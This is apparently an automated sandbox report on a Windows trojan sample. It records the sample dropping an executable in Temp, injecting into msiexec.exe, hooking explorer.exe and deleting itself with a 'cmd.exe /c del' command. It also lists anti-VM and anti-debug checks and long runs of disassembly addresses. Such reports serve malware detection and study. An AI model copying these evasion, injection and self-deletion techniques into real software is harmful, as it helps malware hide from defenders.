          Source: lamsddre43321.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\lamsddre43321.exeFile read: C:\Users\user\Desktop\lamsddre43321.exeJump to behavior
          Source: lamsddre43321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lamsddre43321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\lamsddre43321.exe "C:\Users\user\Desktop\lamsddre43321.exe"
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
          Source: C:\Users\user\Desktop\lamsddre43321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\lamsddre43321.exeFile created: C:\Users\user\AppData\Local\Temp\nsrD707.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/2
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\lamsddre43321.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\xhhad\uirflg\frvl\265a3cee655e492f8e5d84a11f9c3616\cgbuhi\tigzjzwb\Release\tigzjzwb.pdb source: lamsddre43321.exe, 00000000.00000002.292027009.000000000040B000.00000004.00000001.01000000.00000003.sdmp, lamsddre43321.exe, 00000000.00000002.296306970.000000000288E000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000000.266573829.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000001.00000002.276856071.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000002.00000000.274730046.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, msiexec.exe, 0000000F.00000002.541755061.00000000054CF000.00000004.10000000.00040000.00000000.sdmp, rlpjf.exe.0.dr, nsrD708.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001AF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001AF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041A842 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EB7C push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00416B32 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EBC6 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00417D4A push ss; iretd
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041ED04 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EE41 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041EF5F push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0041D7B1 push dword ptr [AD64B49Bh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0501D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5A842 push edx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EBC6 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EB7C push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D56B32 push esi; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D57D4A push ss; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D56C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5ED04 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D502 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D50B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5EE41 push ebp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00D5D7B1 push dword ptr [AD64B49Bh]; ret
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\lamsddre43321.exeFile created: C:\Users\user\AppData\Local\Temp\rlpjf.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001A5219 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\lamsddre43321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6856Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeAPI coverage: 5.6 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.1 %
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\lamsddre43321.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.333032934.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000003.00000000.308178773.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000003.00000000.360860709.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000003.00000000.287015168.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.283466683.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000003.00000000.293538431.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.333032934.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.333671238.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001AE891 _memset,IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B4395 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B538A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED03F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED06F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED0772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_00ED0736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0504A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05003D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05043540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05073D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05078DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
